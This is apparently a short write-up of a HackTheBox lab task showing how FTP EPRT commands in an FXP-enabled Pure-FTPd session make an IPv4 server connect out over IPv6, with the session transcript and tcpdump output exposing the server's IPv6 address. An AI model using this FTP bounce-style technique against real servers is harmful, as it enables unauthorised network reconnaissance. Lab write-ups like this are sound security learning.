Obtaining an IPv6 address from FTP ipv4 using FXP (rfc2428)

One of the tasks from HackTheBox gave me such a puzzle to solve. It is possible. I
spent some time on this because I didn't issue the LIST command. See how it is done correctly :)




220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 500 allowed.
220-Local time is now 03:50. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (10.10.10.156:root): z3G3sJaXD4ktiQgLnXgdVWUUyiuOQpsH
331 User z3G3sJaXD4ktiQgLnXgdVWUUyiuOQpsH OK. Password required
Password:
230-This server supports FXP transfers
230-OK. Current restricted directory is /
230-0 files used (0%) - authorized: 10 files
230 0 Kbytes used (0%) - authorized: 1024 Kb
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote EPRT |1|10.10.10.156|2222|
200-FXP transfer: from 10.10.16.25 to 10.10.10.156
200 PORT command successful
ftp> quote EPRT |2|2001:41d0:52:a00::e66|2222|
200-FXP transfer: from 10.10.10.156 to 2001:41d0:52:a00::e66%176
200 PORT command successful
ftp> quote EPRT |1|10.10.10.156|2222|
200-FXP transfer: from 2001:41d0:52:a00::e66%176 to 10.10.10.156
200 PORT command successful
ftp> quote EPRT |2|dead:beef:4::1017|2222
200-FXP transfer: from 10.10.10.156 to dead:beef:4::1017%144
200 PORT command successful
ftp> LIST
?Invalid command
ftp> quote LIST
425 Could not open data connection to port 2222: Connection refused
ftp>

tcpdump -lni tun0 -vvvvvvv ip6                                                                                                                                                                                                            

tcpdump: listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes

09:55:07.164353 IP6 (flowlabel 0xcf7d1, hlim 63, next-header TCP (6) payload length: 40) dead:beef::250:56ff:feb9:ec5b.34992 > dead:beef:4::1017.2222: Flags [S], cksum 0x3463 (correct), seq 3989541210, win 28800, options [mss 1335,sackOK,TS val 1241233758 ecr 0,nop,wscale 7], length 0

09:55:07.164413 IP6 (flowlabel 0x8ed8b, hlim 64, next-header TCP (6) payload length: 20) dead:beef:4::1017.2222 > dead:beef::250:56ff:feb9:ec5b.34992: Flags [R.], cksum 0x0f90 (correct), seq 0, ack 3989541211, win 0, length 0

09:55:07.164503 IP6 (hlim 255, next-header ICMPv6 (58) payload length: 24) fe80::7335:993e:8d3e:de92 > ff02::1:ff00:0: [icmp6 sum ok] ICMP6, neighbor solicitation, length 24, who has ::

09:55:07.164508 IP6 (hlim 255, next-header ICMPv6 (58) payload length: 24) fe80::7335:993e:8d3e:de92 > ff02::1:ff00:0: [icmp6 sum ok] ICMP6, neighbor solicitation, length 24, who has ::